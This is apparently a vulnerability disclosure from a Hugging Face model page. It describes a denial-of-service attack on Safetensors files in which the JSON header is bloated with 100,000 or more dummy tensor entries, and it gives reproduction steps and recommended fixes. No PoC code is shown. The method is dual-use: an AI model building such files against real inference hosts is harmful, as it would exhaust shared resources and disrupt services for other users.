Vulnerability Report: Denial of Service (DoS) via Header Bloating in Safetensors

Summary

The Safetensors model format, while designed for safety, is vulnerable to Denial of Service (DoS) attacks through the manipulation of its JSON header. Although Safetensors implements a 100MB limit on the header size, an attacker can craft a header containing a massive number of tensor entries (e.g., 100,000+). When a victim attempts to load such a model, the JSON parser must process all these entries, leading to excessive CPU usage and memory consumption. This can be exploited to crash inference servers or significantly delay model loading, constituting a DoS vulnerability.

Target

SafeTensors (.safetensors) - HuggingFace

Impact

Denial of Service (DoS): An attacker can distribute a malicious Safetensors model that, when loaded, consumes all available CPU/memory resources, effectively shutting down the inference service or the user's application.
Resource Exhaustion: In multi-tenant environments (like model hosting platforms), a single malicious model can impact the performance of the entire host.
Bypass of "Safe" Format Assumptions: Safetensors is often assumed to be immune to all loading-time attacks. This vulnerability demonstrates that resource exhaustion is still a viable attack vector.

Proof of Concept (PoC)

The PoC is a Safetensors file (malicious.safetensors) with a bloated header containing 100,000 dummy tensor entries.

Reproduction Steps:

Install the safetensors library: pip install safetensors
Run the provided safetensors_poc.py script to generate malicious.safetensors.
Attempt to load the model using safetensors.safe_open().
Monitor the CPU and memory usage during the loading process.

Technical Details

The vulnerability lies in the linear processing of the JSON header. Even with a 100MB limit, the complexity of the JSON (number of keys, nesting depth) can be manipulated to maximize parsing time. Safetensors relies on the underlying JSON parser's efficiency, but does not implement its own limits on the number of tensors or the complexity of the metadata, only the total byte size.

Recommended Fix

Limit Number of Tensors: Implement a reasonable limit on the maximum number of tensor entries allowed in a single Safetensors file.
Complexity Checks: Add checks for JSON nesting depth and key count during header parsing.
Asynchronous/Resource-Limited Parsing: Perform header parsing in a resource-constrained environment to prevent a single model from exhausting the host's resources.

⚡️👾 by🇭🇷PhonkAlphabet 👾⚡️

Downloads last month: -; Downloads are not tracked for this model. How to track

Inference Providers NEW

This model isn't deployed by any Inference Provider. 🙋 Ask for provider support